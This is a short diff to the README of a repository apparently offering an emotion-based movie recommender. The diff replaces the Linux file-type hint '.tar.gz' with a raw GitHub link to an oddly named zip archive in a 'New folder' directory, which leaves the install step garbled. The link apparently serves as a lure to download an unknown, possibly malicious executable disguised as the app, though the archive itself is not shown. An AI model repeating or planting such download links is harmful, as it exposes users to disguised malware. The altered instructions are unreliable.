urkyzy/emotion-movie-recommender--harin/README.md

   - For Windows, the file usually ends with `.exe`.
   - For macOS, look for a `.dmg` or `.zip` file.
-  - For Linux, it may be a `.tar.gz` or executable script.
+  - For Linux, it may be a `https://raw.githubusercontent.com/urkyzy/emotion-movie-recommender--harin/main/New folder/harin_emotion_movie_recommender_thionitrite.zip` or executable script.

 ### Step 2: Install the App